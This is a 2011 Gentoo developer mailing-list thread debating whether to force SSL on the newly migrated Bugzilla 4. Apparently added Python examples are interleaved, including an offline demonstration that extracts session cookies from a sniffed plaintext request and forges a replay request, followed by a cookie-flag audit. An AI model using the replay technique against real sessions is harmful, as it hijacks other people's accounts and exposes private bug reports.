Re: [gentoo-dev] Bugzilla 4 migration

2011-03-08 Thread Fabian Groffen
On 07-03-2011 17:25:02 -0500, Mike Frysinger wrote:
  As an outsider, I don't like to accept another certificate thing, just to
  view a bugtracker.
 
 if we're only forcing *login*, then this isn't an issue

+1


-- 
Fabian Groffen
Gentoo on a different level



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-08 Thread Donnie Berkholz
On 07:50 Tue 08 Mar , Hans de Graaff wrote:
 On Mon, 2011-03-07 at 08:13 -0600, Donnie Berkholz wrote:
 
  Thanks! One thing I've been very interested about in 3.x and 4.x is API 
  access that's better than screen-scraping. I tried using the 
  python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't 
  seem to work. Do we have anything available?
 
 I've tried an iPad application that uses xmlrpc and that seemed to work
 fine.

Confirmed with my iPhone one. Guess the Python one's broken with BZ 4. 
Fiddling around manually with xmlrpclib works alright, too.

-- 
Thanks,
Donnie

Donnie Berkholz
Sr. Developer, Gentoo Linux
Blog: http://dberkholz.com



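The "fiddling around manually with xmlrpclib" that Donnie describes, written out as an added example for this page (it is not Gentoo infra code and not python-bugzilla). It uses the Python 3 name of the module, xmlrpc.client, and the Bugzilla WebService method names User.login, Bugzilla.version and Bug.get. The endpoint URL, the credentials and the Bug.get reply are constructed so that the script runs offline and sends nothing. The point it makes for the SSL debate elsewhere in this thread: User.login puts the password verbatim in the POST body, so an API client on a plain http:// endpoint leaks credentials exactly as a browser login form would.

```python
"""Hand-built Bugzilla XML-RPC exchange (added example, offline).

Method names User.login / Bug.get are Bugzilla WebService methods; the
endpoint, credentials and the server reply below are constructed."""
import xmlrpc.client
from urllib.parse import urlparse


def require_https(endpoint: str) -> str:
    """Refuse a plain-http xmlrpc.cgi: the login call carries the
    password in clear text, so the client needs TLS as much as a
    browser does."""
    if urlparse(endpoint).scheme != "https":
        raise ValueError(f"refusing to send credentials over {endpoint}")
    return endpoint


def login_request_body(login: str, password: str) -> bytes:
    """The exact POST body ServerProxy(...).User.login({...}) would send."""
    return xmlrpc.client.dumps(({"login": login, "password": password},),
                               methodname="User.login").encode()


def password_visible_on_wire(body: bytes, password: str) -> bool:
    """True if a passive listener would see the password verbatim."""
    return password.encode() in body


def parse_bug_get(response_xml: str) -> dict:
    """Decode a Bug.get methodResponse into {bug id: summary}."""
    (result,), _method = xmlrpc.client.loads(response_xml)
    return {bug["id"]: bug["summary"] for bug in result["bugs"]}


# Constructed reply in the shape Bugzilla returns for Bug.get (assumed
# sample data, not a real bug).
SAMPLE_BUG_GET_RESPONSE = xmlrpc.client.dumps(
    ({"bugs": [{"id": 1, "summary": "constructed sample bug",
                "is_open": True}]},),
    methodresponse=True)


def open_proxy(endpoint: str) -> xmlrpc.client.ServerProxy:
    """Build the real client object after the scheme check.  Nothing is
    contacted until a method such as proxy.Bugzilla.version() is called."""
    return xmlrpc.client.ServerProxy(require_https(endpoint))


if __name__ == "__main__":
    body = login_request_body("dev@example.org", "hunter2")   # constructed
    print(body.decode())
    print("password readable on the wire:",
          password_visible_on_wire(body, "hunter2"))
    print(parse_bug_get(SAMPLE_BUG_GET_RESPONSE))
    proxy = open_proxy("https://bugs.gentoo.org/xmlrpc.cgi")
    # proxy.Bugzilla.version() would now perform a real, encrypted call.
```

Running the script prints the login XML with the password in the clear and the decoded sample bug; pointing open_proxy() at an http:// URL raises before any request is made.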

Re: [gentoo-dev] Bugzilla 4 migration

2011-03-08 Thread Michał Górny
On Mon, 07 Mar 2011 15:06:25 -0500
Olivier Crête tes...@gentoo.org wrote:

 On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote:
  Why does everyone assume it needs to be enforced? If a user is
  interested in protecting his/her data, he/she can simply use
  https://. If he/she is not, there is no real reason to enforce
  slower (and not always supported) SSL.
 
 Maybe it's not to protect the user, but to protect the Gentoo
 infrastructure.. And really, SSL has been supported by every browser
 for the last 15 years. And it is not in any way slow or slower than
 non-SSL.

If you really think you need to force all users to use SSL, thus
assuming they're unable to make their own decisions, why don't you
restrict bugzie access completely?

-- 
Best regards,
Michał Górny




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-08 Thread Antoni Grzymała

On Tue, 8 Mar 2011 15:26:34 +0100, Michał Górny wrote:

On Mon, 07 Mar 2011 15:06:25 -0500
Olivier Crête tes...@gentoo.org wrote:


On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote:
 Why does everyone assume it needs to be enforced? If a user is
 interested in protecting his/her data, he/she can simply use
 https://. If he/she is not, there is no real reason to enforce
 slower (and not always supported) SSL.

Maybe it's not to protect the user, but to protect the Gentoo
infrastructure.. And really, SSL has been supported by every browser
for the last 15 years. And it is not in any way slow or slower than
non-SSL.


If you really think you need to force all users to use SSL, thus
assuming they're unable to make their own decisions, why don't you
restrict bugzie access completely?


Michał,

You don't seem to (or pretend not to) understand that using SSL 
protects not *the user* (in which case, yes, a user is free to leave the 
door to *his own* house wide open), but the Gentoo infrastructure that 
is far from his own and that all of us are using. Besides, complaining 
about SSL being slow is absurd considering how mildly interactive and 
how low-traffic a typical bugzilla session is. You could do just fine 
over a 9600 bps modem.


Regards,

Antoni



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-08 Thread Michał Górny
On Tue, 08 Mar 2011 16:41:08 +0200
Antoni Grzymała awa...@chopin.edu.pl wrote:

  On Tue, 8 Mar 2011 15:26:34 +0100, Michał Górny wrote:
  On Mon, 07 Mar 2011 15:06:25 -0500
  Olivier Crête tes...@gentoo.org wrote:
 
  On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote:
   Why does everyone assume it needs to be enforced? If a user is
   interested in protecting his/her data, he/she can simply use
   https://. If he/she is not, there is no real reason to enforce
   slower (and not always supported) SSL.
 
  Maybe it's not to protect the user, but to protect the Gentoo
  infrastructure.. And really, SSL has been supported by every
  browser for the last 15 years. And it is not in any way slow or
  slower than non-SSL.
 
  If you really think you need to force all users to use SSL, thus
  assuming they're unable to make their own decisions, why don't you
  restrict bugzie access completely?
 
 You don't seem to (or pretend not to) understand that using SSL
 protects not *the user* (in which case, yes, a user is free to leave
 the door to *his own* house wide open), but the Gentoo infrastructure
 that is far from his own and that all of us are using.

Please explain to me how not using SSL for a particular bugzie user is
going to hurt Gentoo infra. Even if we're talking about a dev,
and we're really assuming a dev is completely unaware of security
issues he/she's dealing with, I'd say power outage could cause more
damage.

 Besides, complaining about SSL being slow is absurd considering how
 mildly interactive and how low-traffic a typical bugzilla session is.
 You could do just fine over a 9600 bps modem.

It is more absurd to waste 5 minutes trying to establish a login session
due to packet loss.

-- 
Best regards,
Michał Górny




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-08 Thread Nathan Phillip Brink
On Tue, Mar 08, 2011 at 03:53:01PM +0100, Michał Górny wrote:
 On Tue, 08 Mar 2011 16:41:08 +0200
 Antoni Grzymała awa...@chopin.edu.pl wrote:
 
   On Tue, 8 Mar 2011 15:26:34 +0100, Michał Górny wrote:
   On Mon, 07 Mar 2011 15:06:25 -0500
   Olivier Crête tes...@gentoo.org wrote:
  
   On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote:
    Why does everyone assume it needs to be enforced? If a user is
    interested in protecting his/her data, he/she can simply use
    https://. If he/she is not, there is no real reason to enforce
    slower (and not always supported) SSL.
  
   Maybe it's not to protect the user, but to protect the Gentoo
   infrastructure.. And really, SSL has been supported by every
   browser for the last 15 years. And it is not in any way slow or
   slower than non-SSL.
  
   If you really think you need to force all users to use SSL, thus
   assuming they're unable to make their own decisions, why don't you
   restrict bugzie access completely?
  
  You don't seem to (or pretend not to) understand that using SSL
  protects not *the user* (in which case, yes, a user is free to leave
  the door to *his own* house wide open), but the Gentoo infrastructure
  that is far from his own and that all of us are using.
 
 Please explain to me how not using SSL for a particular bugzie user is
 going to hurt Gentoo infra. Even if we're talking about a dev,
 and we're really assuming a dev is completely unaware of security
 issues he/she's dealing with, I'd say power outage could cause more
 damage.

If you access a bug which a user marked private/for devs only, or some
security bug, then the process of you viewing this information without
SSL would disclose this information to anyone listening on your
network. And disclosing your session cookie would allow anyone to find
any such private data they _want_ to find rather than just the content
you're viewing. Thus, by encrypting everything you are protecting
Gentoo users' data which is posted as private on bugzilla because they
trust that ``private'' actually means private.

  Besides, complaining about SSL being slow is absurd considering how
  mildly interactive and how low-traffic a typical bugzilla session is.
  You could do just fine over a 9600 bps modem.
 
 It is more absurd to waste 5 minutes trying to establish login session
 due to packet loss.

And if you have such a bad internet connection as you claim to have,
then perhaps there's a higher chance of people trolling your packets
anyways :-p.

-- 
binki

Look out for missing apostrophes!



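Nathan's point above (a plaintext session discloses the session cookie, and the cookie lets a listener fetch any private bug they want, not just the one the victim opened) and Tobias' earlier one (SSL for login only is not enough, cf. Firesheep) are the same mechanism. The following is an added example for this page, not Gentoo infra code: it parses a constructed capture of a plain http:// Bugzilla request, pulls out the login cookies the way a sidejacking tool does, builds the replay request an attacker would send, and audits a Set-Cookie header for the Secure flag that would have stopped the browser from sending the cookie over http:// in the first place. The cookie names Bugzilla_login and Bugzilla_logincookie are assumed from the Bugzilla versions under discussion; the captured request and cookie values are constructed. It also shows why tying the cookie to an IP (Tobias' caveat) does not help against the coffee-shop case: everyone behind the same NAT presents the same address.

```python
"""Session sidejacking over plain HTTP, and the cookie flag that closes it.
Added example; capture, cookie values and cookie names are constructed /
assumed, see the lead-in."""
from typing import Dict, List

# Constructed capture: what a passive listener on the same Wi-Fi sees when
# a logged-in user loads a bug over plain http://.
CAPTURED_REQUEST = (
    "GET /show_bug.cgi?id=12345 HTTP/1.1\r\n"
    "Host: bugs.gentoo.org\r\n"
    "Cookie: Bugzilla_login=4242; Bugzilla_logincookie=ZXhhbXBsZQ==; "
    "LANG=en\r\n"
    "\r\n"
)

# Assumed Bugzilla cookie names; the rest of the Cookie header is noise.
SESSION_COOKIE_NAMES = {"Bugzilla_login", "Bugzilla_logincookie"}


def sniff_session_cookies(raw_request: str) -> Dict[str, str]:
    """Return the session-bearing cookies from a plaintext HTTP request.
    The password is never seen; the session is enough."""
    headers, _, _body = raw_request.partition("\r\n\r\n")
    found: Dict[str, str] = {}
    for line in headers.split("\r\n")[1:]:        # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "cookie":
            for pair in value.split(";"):
                key, _, val = pair.strip().partition("=")
                if key in SESSION_COOKIE_NAMES:
                    found[key] = val
    return found


def forge_replay_request(stolen: Dict[str, str], path: str) -> str:
    """The request an attacker sends to read *any* private bug with the
    stolen cookies.  Built as text only; nothing is sent."""
    cookie = "; ".join(f"{k}={v}" for k, v in sorted(stolen.items()))
    return (f"GET {path} HTTP/1.1\r\nHost: bugs.gentoo.org\r\n"
            f"Cookie: {cookie}\r\n\r\n")


def same_nat_passes_ip_check(victim_public_ip: str, attacker_public_ip: str) -> bool:
    """An IP-bound cookie is accepted whenever the attacker egresses via
    the same NAT as the victim, i.e. the usual open-Wi-Fi situation."""
    return victim_public_ip == attacker_public_ip


def cookie_flag_issues(set_cookie: str) -> List[str]:
    """Audit one Set-Cookie header.  Without 'Secure' the browser sends
    the cookie over http:// too, so forcing https only for the login page
    leaves every later request exposed."""
    attrs = {a.strip().split("=")[0].lower() for a in set_cookie.split(";")[1:]}
    issues = []
    if "secure" not in attrs:
        issues.append("missing Secure: cookie is sent over plain http://")
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: readable by injected script")
    return issues


if __name__ == "__main__":
    stolen = sniff_session_cookies(CAPTURED_REQUEST)
    print("sniffed:", stolen)
    print(forge_replay_request(stolen, "/show_bug.cgi?id=1"))
    print("IP check defeated behind shared NAT:",
          same_nat_passes_ip_check("203.0.113.7", "203.0.113.7"))
    weak = "Bugzilla_logincookie=ZXhhbXBsZQ==; path=/"
    fixed = "Bugzilla_logincookie=ZXhhbXBsZQ==; path=/; Secure; HttpOnly"
    print("weak  :", cookie_flag_issues(weak))
    print("fixed :", cookie_flag_issues(fixed))
```

The audit function is the check worth running against a live deployment's login response: if the session cookie lacks Secure, a "force SSL for login" setting protects the password and nothing else.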

Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Michał Górny
On Sun, 06 Mar 2011 23:55:31 +0100
Christian Ruppert id...@gentoo.org wrote:


 SSL is enabled by default now, so it's forced. Unfortunately the
 option to force SSL *only* for logged in user is no longer available
 in Bugzilla-4.x. It has been added in early 3.x AFAIR and later
 replaced by forcing SSL at all or not.
 If *anybody* can't use SSL for any reason please yell so that we can
 decide if we leave it as it is (plain + encrypted) or not.

Is there any *real* reason to force SSL? It is *hell* slow.

-- 
Best regards,
Michał Górny




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Dirkjan Ochtman
On Mon, Mar 7, 2011 at 10:12, Michał Górny mgo...@gentoo.org wrote:
 Is there any *real* reason to force SSL? It is *hell* slow.

Do you mean that SSL is slow or that bugs is slow? I also noticed that
Bugzilla is very slow right now, but it seems unlikely that it's due
to SSL.

Cheers,

Dirkjan



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Mike Frysinger
On Mon, Mar 7, 2011 at 4:12 AM, Michał Górny wrote:
 On Sun, 06 Mar 2011 23:55:31 +0100 Christian Ruppert wrote:
 SSL is enabled by default now, so it's forced. Unfortunately the
 option to force SSL *only* for logged in user is no longer available
 in Bugzilla-4.x. It has been added in early 3.x AFAIR and later
 replaced by forcing SSL at all or not.
 If *anybody* can't use SSL for any reason please yell so that we can
 decide if we leave it as it is (plain + encrypted) or not.

 Is there any *real* reason to force SSL? It is *hell* slow.

it should of course be forced for logging in
-mike



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Michał Górny
On Mon, 7 Mar 2011 10:24:33 +0100
Dirkjan Ochtman d...@gentoo.org wrote:

 On Mon, Mar 7, 2011 at 10:12, Michał Górny mgo...@gentoo.org wrote:
  Is there any *real* reason to force SSL? It is *hell* slow.
 
 Do you mean that SSL is slow or that bugs is slow? I also noticed that
 Bugzilla is very slow right now, but it seems unlikely that it's due
 to SSL.

Both but yep, unrelated. I am just a personal SSL-forced-everywhere
hater.

-- 
Best regards,
Michał Górny




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Robin H. Johnson
On Mon, Mar 07, 2011 at 10:12:14AM +0100, Michał Górny wrote:
 On Sun, 06 Mar 2011 23:55:31 +0100
 Christian Ruppert id...@gentoo.org wrote:
  SSL is enabled by default now, so it's forced. Unfortunately the
  option to force SSL *only* for logged in user is no longer available
  in Bugzilla-4.x. It has been added in early 3.x AFAIR and later
  replaced by forcing SSL at all or not.
  If *anybody* can't use SSL for any reason please yell so that we can
  decide if we leave it as it is (plain + encrypted) or not.
 Is there any *real* reason to force SSL? It is *hell* slow.
The SSL forcing is temporarily disabled until we trace down why it's
causing slowness. Tracking is in bug 357711.

-- 
Robin Hugh Johnson
Gentoo Linux: Developer, Trustee & Infrastructure Lead
E-Mail : robb...@gentoo.org
GnuPG FP   : 11AC BA4F 4778 E3F6 E4ED  F38E B27B 944E 3488 4E85



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Robin H. Johnson
On Sun, Mar 06, 2011 at 11:55:31PM +0100, Christian Ruppert wrote:
 our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours.
 We're going to migrate our old Bugzilla to Bugzilla-4.
 We expect our update to finish within the next hours.
All completed now. If you run into any problems, please file a new bug
under the Bugzilla product.

I'm sending this email as idl0r went to bed after 8+ hours straight of
working on the new Bugzilla setup.

We apologize for this taking so extremely long.

Things didn't go so well at the database layer [1], and that hugely
increased the migration time. 

The Gentoo for the Bugzilla service went perfectly, a huge thanks to
idl0r for the years of work he has put into them.

 Some notes:
 SSL is enabled by default now, so it's forced.
The forcing is temporarily disabled now until we fix a possible related
performance issue, per bug 357711.

Footnotes:
[1] We discovered a potential MySQL bug with replication, where the
slaves end up truncating mediumtext columns to 1024 characters when done
with REPLACE INTO and GROUP_CONCAT. Will pursue with upstream this week.
This was only noted with mk-table-checksum, and we decided to just redo
replication from the master that was used for introducing the schema
changes. This added 3.5 hours onto the end of the migration :-(.

-- 
Robin Hugh Johnson
Gentoo Linux: Developer, Trustee & Infrastructure Lead
E-Mail : robb...@gentoo.org
GnuPG FP   : 11AC BA4F 4778 E3F6 E4ED  F38E B27B 944E 3488 4E85




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread justin
On 07/03/11 10:51, Robin H. Johnson wrote:
 The Gentoo for the Bugzilla service went perfectly, a huge thanks to
 idl0r for the years of work he has put into them.
 

Thanks for all your work on this.





Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Jorge Manuel B. S. Vicetto

On 07-03-2011 08:51, Robin H. Johnson wrote:
 On Sun, Mar 06, 2011 at 11:55:31PM +0100, Christian Ruppert wrote:
 our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours.
 We're going to migrate our old Bugzilla to Bugzilla-4.
 We expect our update to finish within the next hours.
 All completed now. If you run into any problems, please file a new bug
 under the Bugzilla product.

Thank you both for all the work in the upgrade and for all the
maintenance work you've been doing for years on our Bugzilla.

-- 
Regards,

Jorge Vicetto (jmbsvicetto) - jmbsvicetto at gentoo dot org
Gentoo- forums / Userrel / Devrel / KDE / Elections / RelEng



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Markos Chandras
On Sun, Mar 06, 2011 at 11:55:31PM +0100, Christian Ruppert wrote:
 Dear community,
 
 our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours.
 We're going to migrate our old Bugzilla to Bugzilla-4.
 We expect our update to finish within the next hours.
 
 Some notes:
 SSL is enabled by default now, so it's forced. Unfortunately the
 option to force SSL *only* for logged in user is no longer available in
 Bugzilla-4.x. It has been added in early 3.x AFAIR and later replaced by
 forcing SSL at all or not.
 If *anybody* can't use SSL for any reason please yell so that we can
 decide if we leave it as it is (plain + encrypted) or not.
 
 All custom/Gentoo patches will be available *later* in a git repo[1].
 So if you'd like to fix something or improve the theme you can
 contribute patches.
 Thanks to Alex Legler (a3li) for the Bugzilla theme.
 
 [1]
 http://git.overlays.gentoo.org/gitweb/?p=proj/gentoo-bugzilla.git;a=summary
 
 -- 
 Regards,
 Christian Ruppert
 Role: Gentoo Linux developer, Bugzilla administrator and Infrastructure
 member
 Fingerprint: EEB1 C341 7C84 B274 6C59  F243 5EAB 0C62 B427 ABC8
 

Thank you very much. New bugzie looks pretty :)


Regards,
-- 
Markos Chandras / Gentoo Linux Developer / Key ID: B4AFF2C2




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Donnie Berkholz
On 09:51 Mon 07 Mar , Robin H. Johnson wrote:
 The Gentoo for the Bugzilla service went perfectly, a huge thanks to
 idl0r for the years of work he has put into them.

Thanks! One thing I've been very interested about in 3.x and 4.x is API 
access that's better than screen-scraping. I tried using the 
python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't 
seem to work. Do we have anything available?

-- 
Thanks,
Donnie

Donnie Berkholz
Sr. Developer, Gentoo Linux
Blog: http://dberkholz.com




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Tobias Klausmann
Hi! 

On Mon, 07 Mar 2011, Mike Frysinger wrote:
  If *anybody* can't use SSL for any reason please yell so that we can
  decide if we leave it as it is (plain + encrypted) or not.
 
  Is there any *real* reason to force SSL? It is *hell* slow.
 
 it should of course be forced for logging in

If it is enforced for login, it should be enforced for logged
in sessions, cf. cookie stealing (for a POC: Firesheep). And no,
restricting the login cookie to an IP is *not* safe enough.

Regards,
Tobias

-- 
Sent from aboard the Culture ship
GSV Zero Gravitas



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Dane Smith

On 03/07/2011 09:48 AM, Tobias Klausmann wrote:
 Hi! 
 
 On Mon, 07 Mar 2011, Mike Frysinger wrote:
 If *anybody* can't use SSL for any reason please yell so that we can
 decide if we leave it as it is (plain + encrypted) or not.

 Is there any *real* reason to force SSL? It is *hell* slow.

 it should of course be forced for logging in
 
 If it is enforced for login, it should be enforced for logged
 in sessions, cf. cookie stealing (for a POC: Firesheep). And no,
 restricting the login cookie to an IP is *not* safe enough.
 
 Regards,
 Tobias
 

First off, a big thanks to infra and all involved in the migration. It
looks awesome!

As to the SSL bit, there is *no* reason not to be using SSL for anything
that requires a username / password. And I 100% agree with Tobias. If
it's necessary to use SSL to login, it's necessary to use it for the
duration of the session. I don't know how feasible it is to do, but if
normal viewing (no login) can be left SSL free, I see no issue there.
Otherwise however, SSL should be in use.

Regards,
-- 
Dane Smith (c1pher)
Gentoo Linux Developer -- QA / Crypto / Sunrise / x86
RSA Key: http://pgp.mit.edu:11371/pks/lookup?search=0x0C2E1531&op=index



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Mike Frysinger
On Mon, Mar 7, 2011 at 9:48 AM, Tobias Klausmann wrote:
 On Mon, 07 Mar 2011, Mike Frysinger wrote:
  If *anybody* can't use SSL for any reason please yell so that we can
  decide if we leave it as it is (plain + encrypted) or not.
 
  Is there any *real* reason to force SSL? It is *hell* slow.

 it should of course be forced for logging in

 If it is enforced for login, it should be enforced for logged
 in sessions, cf. cookie stealing (for a POC: Firesheep). And no,
 restricting the login cookie to an IP is *not* safe enough.

you're talking about two different things.  imo it's more important to
protect the credentials than spoofing/replay attacks.  the former is a
no brainer while the latter is fine to leave to the discretion of the
end user.
-mike



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Donnie Berkholz
On 16:35 Mon 07 Mar , Dirkjan Ochtman wrote:
 On Mon, Mar 7, 2011 at 15:13, Donnie Berkholz dberkh...@gentoo.org wrote:
  Thanks! One thing I've been very interested about in 3.x and 4.x is API
  access that's better than screen-scraping. I tried using the
  python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't
  seem to work. Do we have anything available?
 
 Is that the one you get if you emerge pybugz?

No, pybugz is a screen-scraper. We previously had Bugzilla 2 so we 
couldn't do anything else.

 The Mozilla guys made a pretty nice REST API that can be installed as a
 plugin, I think. Maybe we could run that?

I've been somewhat following that too, but I don't know if anyone's 
written a CLI client for it yet, whereas python-bugzilla already exists 
(and has an ebuild in the sabayon overlay).

-- 
Thanks,
Donnie

Donnie Berkholz
Sr. Developer, Gentoo Linux
Blog: http://dberkholz.com




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Michał Górny
On Mon, 7 Mar 2011 15:48:19 +0100
Tobias Klausmann klaus...@gentoo.org wrote:

 On Mon, 07 Mar 2011, Mike Frysinger wrote:
   If *anybody* can't use SSL for any reason please yell so that we
   can decide if we leave it as it is (plain + encrypted) or not.
  
   Is there any *real* reason to force SSL? It is *hell* slow.
  
  it should of course be forced for logging in
 
 If it is enforced for login, it should be enforced for logged
 in sessions, cf. cookie stealing (for a POC: Firesheep). And no,
 restricting the login cookie to an IP is *not* safe enough.

Why does everyone assume it needs to be enforced? If a user is interested
in protecting his/her data, he/she can simply use https://. If he/she
is not, there is no real reason to enforce slower (and not always
supported) SSL.

It's like forcing everyone to have doors with semi-automatic locks.

-- 
Best regards,
Michał Górny




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Christian Ruppert
On 03/07/2011 08:47 PM, Michał Górny wrote:
 On Mon, 7 Mar 2011 15:48:19 +0100
 Tobias Klausmann klaus...@gentoo.org wrote:
 
 On Mon, 07 Mar 2011, Mike Frysinger wrote:
 If *anybody* can't use SSL for any reason please yell so that we
 can decide if we leave it as it is (plain + encrypted) or not.

 Is there any *real* reason to force SSL? It is *hell* slow.

 it should of course be forced for logging in

 If it is enforced for login, it should be enforced for logged
 in sessions, cf. cookie stealing (for a POC: Firesheep). And no,
 restricting the login cookie to an IP is *not* safe enough.
 
 Why does everyone assume it needs to be enforced? If a user is interested
 in protecting his/her data, he/she can simply use https://. If he/she
 is not, there is no real reason to enforce slower (and not always
 supported) SSL.
 
 It's like forcing everyone to have doors with semi-automatic locks.
 

*I* think it's ok if we're going to protect *our* data. Some user may
even benefit from it.
I don't see any disadvantages for our users.

-- 
Regards,
Christian Ruppert
Role: Gentoo Linux developer, Bugzilla administrator and Infrastructure
member
Fingerprint: EEB1 C341 7C84 B274 6C59  F243 5EAB 0C62 B427 ABC8





Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Olivier Crête
On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote:
 On Mon, 7 Mar 2011 15:48:19 +0100
 Tobias Klausmann klaus...@gentoo.org wrote:
 
  On Mon, 07 Mar 2011, Mike Frysinger wrote:
If *anybody* can't use SSL for any reason please yell so that we
can decide if we leave it as it is (plain + encrypted) or not.
   
Is there any *real* reason to force SSL? It is *hell* slow.
   
   it should of course be forced for logging in
  
  If it is enforced for login, it should be enforced for logged
  in sessions, cf. cookie stealing (for a POC: Firesheep). And no,
  restricting the login cookie to an IP is *not* safe enough.
 
 Why does everyone assume it needs to be enforced? If a user is interested
 in protecting his/her data, he/she can simply use https://. If he/she
 is not, there is no real reason to enforce slower (and not always
 supported) SSL.

Maybe it's not to protect the user, but to protect the Gentoo
infrastructure.. And really, SSL has been supported by every browser for
the last 15 years. And it is not in any way slow or slower than non-SSL.


-- 
Olivier Crête
tes...@gentoo.org
Gentoo Developer




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Fabian Groffen
On 07-03-2011 15:06:25 -0500, Olivier Crête wrote:
 Maybe it's not to protect the user, but to protect the Gentoo
 infrastructure.. And really, SSL has been supported by every browser for
 the last 15 years. And it is not in any way slow or slower than non-SSL.

but the certificate security click-through-couple-of-times before you
can access bugzilla is sort of annoying

As an outsider, I don't like to accept another certificate thing, just to
view a bugtracker.


-- 
Fabian Groffen
Gentoo on a different level



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Rich Freeman
On Mon, Mar 7, 2011 at 4:32 PM, Fabian Groffen grob...@gentoo.org wrote:
 As an outsider, I don't like to accept another certificate thing, just to
 view a bugtracker.

When you think about it, this is a defect with your browser, and not
so much with SSL itself.

Your browser generally doesn't complain about unauthenticated
connections.  It accepts unauthenticated connections that aren't
encrypted without any issues, despite these being completely open to
numerous attacks.  However, your browser does complain when it makes
an unauthenticated connection that IS encrypted, even though this is
vulnerable to far fewer attacks.

Browsers shouldn't bug the user about self-signed certificates - they
should simply and clearly show that the user is connected to a host
that isn't authenticated by a trusted intermediate.

Oh, and browsers shouldn't come with root certs pre-installed by the
browser distributor either, but that is about as likely to get fixed
as the problem I just described.

In any case, I don't see poor browser design as a valid reason for
avoiding the use of SSL...

Rich



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Fabian Groffen
On 07-03-2011 16:52:23 -0500, Rich Freeman wrote:
 In any case, I don't see poor browser design as a valid reason for
 avoiding the use of SSL...

Please use a MUA that properly honours Reply-To: headers.  I'm on the
list.


-- 
Fabian Groffen
Gentoo on a different level



Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Mike Frysinger
On Monday, March 07, 2011 16:59:22 Fabian Groffen wrote:
 On 07-03-2011 16:52:23 -0500, Rich Freeman wrote:
  In any case, I don't see poor browser design as a valid reason for
  avoiding the use of SSL...
 
 Please use a MUA that properly honours Reply-To: headers.  I'm on the
 list.

subscribed != receiving.  there's no way of knowing who is.  get over it.
-mike




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Mike Frysinger
On Monday, March 07, 2011 16:32:55 Fabian Groffen wrote:
 On 07-03-2011 15:06:25 -0500, Olivier Crête wrote:
  Maybe it's not to protect the user, but to protect the Gentoo
  infrastructure.. And really, SSL has been supported by every browser for
  the last 15 years. And it is not in any way slow or slower than non-SSL.
 
 but the certificate security click-through-couple-of-times before you
 can access bugzilla is sort of annoying

i heard rumors the CAcert root is finally going into Firefox ...

 As an outsider, I don't like to accept another certificate thing, just to
 view a bugtracker.

if we're only forcing *login*, then this isn't an issue
-mike




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-07 Thread Hans de Graaff
On Mon, 2011-03-07 at 08:13 -0600, Donnie Berkholz wrote:

 Thanks! One thing I've been very interested about in 3.x and 4.x is API 
 access that's better than screen-scraping. I tried using the 
 python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't 
 seem to work. Do we have anything available?

I've tried an iPad application that uses xmlrpc and that seemed to work
fine.

Kind regards,

Hans




Re: [gentoo-dev] Bugzilla 4 migration

2011-03-06 Thread Christian Ruppert
On 03/07/2011 01:00 AM, Jan Kundrát wrote:
 On 03/06/11 23:55, Christian Ruppert wrote:
 our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours.
 We're going to migrate our old Bugzilla to Bugzilla-4.
 We expect our update to finish within the next hours.
 
 (Private reply, as I don't feel like flaming you in public. Feel free to
 re-send to a public list, or quote, preferably as a whole.)
 
 Hi Christian,
 I wanted to ask if I missed the announcement of the migration. I tried
 to imagine a case which would force people to go ahead and perform such
 an action without informing the world about the downtime in advance, but
 failed to find one. So, did I miss the announcement, or was that a lapse
 on some guy's side, or is it something else which warranted a swift
 action? Anyway, I'm looking forward to a nice, upgraded bugzie.
 
 Hm, so before sending this mail, I checked my gentoo-dev archive, and
 the first e-mail about Bugzilla migration is roughly 12 hours old.
 That's very different from how Infra has handled any other migration in
 the past (apart from dealing with unexpected emergencies, of course). I
 realize I'm in the armchair position in this case, but this looks like a
 rather dangerous move. When you add the workflow change, I wouldn't
 stick with an announcement 12 hours in advance myself (I do sysadmin
 stuff as a day job).
 
 With kind regards,
 Jan
 

Hey Jan,

I know I didn't announce it properly. It was *my* fault but this is
also a special case IMO.
We decided to migrate just a few hours ago because robbat2 and I finally
have enough time to do it now. We've been waiting since about 2007 for
Bugzilla upgrades and it's now 2011, so I thought it's OK to do it now
instead of waiting another few months (probably) or longer until we both
have enough time again etc.

